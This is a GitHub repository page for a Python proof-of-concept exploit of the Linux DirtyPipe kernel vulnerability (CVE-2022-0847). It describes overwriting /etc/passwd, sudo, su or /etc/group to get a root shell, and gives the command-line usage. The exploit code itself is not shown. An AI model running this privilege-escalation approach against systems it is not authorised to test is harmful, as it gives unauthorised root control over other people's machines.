Skip to content

A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell

License

Notifications You must be signed in to change notification settings

crusoe112/DirtyPipePython

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

dirty.py

Description

This is an exploit for the Linux kernel vulnerability CVE-2022-0847 (DirtyPipe) discovered by Max Kellerman.

This code combines two existing DirtyPipe POC's into one:

  • febinrev
    • Overwrites sudo binary to directly pop a root shell
  • eremus-dev
    • A direct copy of Kellerman's POC into Python

This code checks if:

  • /etc/passwd can be overwritten to get a root shell
  • The sudo binary can be overwritten to get a root shell
  • The su binary can be overwritten to get a root shell
  • The current user can be added to the sudo group in /etc/group

It then executes the first option that is possible in that order and drops the user directly into a root shell.

For an excellent explanation of the vulnerability itself, see Kellerman's writeup.

Getting Started

Requires python 10.X for the use of os.splice

Usage

usage: dirty.py [-h] [--target {passwd,group,sudo,su}]

Use dirty pipe vulnerability to pop root shell

options:
  -h, --help            show this help message and exit
  --target {passwd,group,sudo,su}
                        The target read-only file to overwrite

Examples

Try all targets until one works

vulnerable@kali:~$ python dirty.py

Try a specific target

vulnerable@kali:~$ python dirty.py --target passwd

Cleanup

The script may write several files to /tmp:

  • /tmp/backup_sudo
  • /tmp/backup_su
  • /tmp/passwd
  • /tmp/sh
  • /tmp/group

The generated files should be removed after execution, but may require root access to do so.

Dealing with errors

This exploit will overwrite a page of the file that resides in the page cache. It is unlikely to corrupt the actual file. If there is corruption or an error, you likely just need to wait until the page is overwritten in the cache, or restart your computer to fix any problems. That being said, I bear no responsibility for damage done by this code, so please read carefully and hack responsibly. Be sure to check out Max Kellerman's writeup at cm4all.com as well.

Acknowledgements

About

A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages